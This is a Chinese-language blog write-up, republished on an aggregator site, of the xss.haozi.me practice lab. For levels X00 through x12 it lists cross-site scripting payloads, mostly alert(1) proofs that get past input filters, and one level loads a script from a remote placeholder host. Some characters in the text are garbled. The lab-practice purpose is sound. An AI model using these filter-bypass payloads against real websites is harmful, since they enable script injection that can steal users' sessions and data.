xss.haozi靶机
Posted bingtang123
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了xss.haozi靶机相关的知识,希望对你有一定的参考价值。
X00
<script>alert(1)</script>
X01
</textarea><script>alert(1)</script><textarea>
X02
"><script>alert(1)</script><"
X03
将()替换成空字符
<script>alert`1`</script>
使用反引号
X04
()和反引号都过滤
<svg><script>alert(1)</script> 进行html编码 <svg><script>alert(1)</script>
X05
-->替换成了笑脸
--!><script>alert(1)</script><--
X06
匹配auto和on开头加=的数据,>符号,替换为_
在等号前换行
onmousedown
=alert(1)
X07
过滤以<开头 以>结尾的字符串
<img src=1 onerror="alert(1)"
X08
</style ><script>alert(1)</script><style>
X09
https://www.segmentfault.com
https://www.segmentfault.com"></script><script>alert(1)//
X0A
https://www.segmentfault.com@xss.haozi.me/j.js
https://www.segmentfault.com@vps地址/xss.js
X0B
将输?的字符串转换成?写
<svg onload=alert(1)>
html编码
<svg onload=alert(1)>
X0c
<svg onload=alert(1)>
X0d
//只能注释单行,利?换?逃逸注释,利?html的"-->"注释掉后?字符
换行
alert(1)
-->
X0e
未解决出来
X0f
‘);alert(1)//
X10
alert(1)
X11
");alert(1)//
x12
将双引号进行了转义
");alert(1)//
以上是关于xss.haozi靶机的主要内容,如果未能解决你的问题,请参考以下文章